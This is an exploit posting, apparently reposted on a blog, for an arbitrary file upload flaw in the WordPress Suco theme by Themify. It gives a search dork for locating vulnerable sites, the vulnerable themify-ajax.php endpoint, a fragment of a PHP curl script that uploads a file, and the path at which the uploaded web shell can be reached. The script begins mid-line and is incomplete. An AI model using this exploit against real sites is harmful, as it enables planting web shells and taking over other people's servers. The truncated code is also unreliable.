#Title : Wordpress Suco Themes Arbitrary File Upload #Author : DevilScreaM #Date : 11/20/2013 - 20 November 2013 #Category : Web Applications #Type : PHP #Vendor : http://themify.me/ #Link : http://themify.me/themes/suco #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Tested : Mozila, Chrome, Opera -> Windows & Linux #Vulnerabillity : Arbitrary File Upload #Dork : inurl:wp-content/themes/suco Arbitrary File Upload Exploit : http://SITE-TARGET/wp-content/themes/suco/themify/themify-ajax.php Script : "@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php
Wordpress Suco Themes Arbitrary File Upload
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar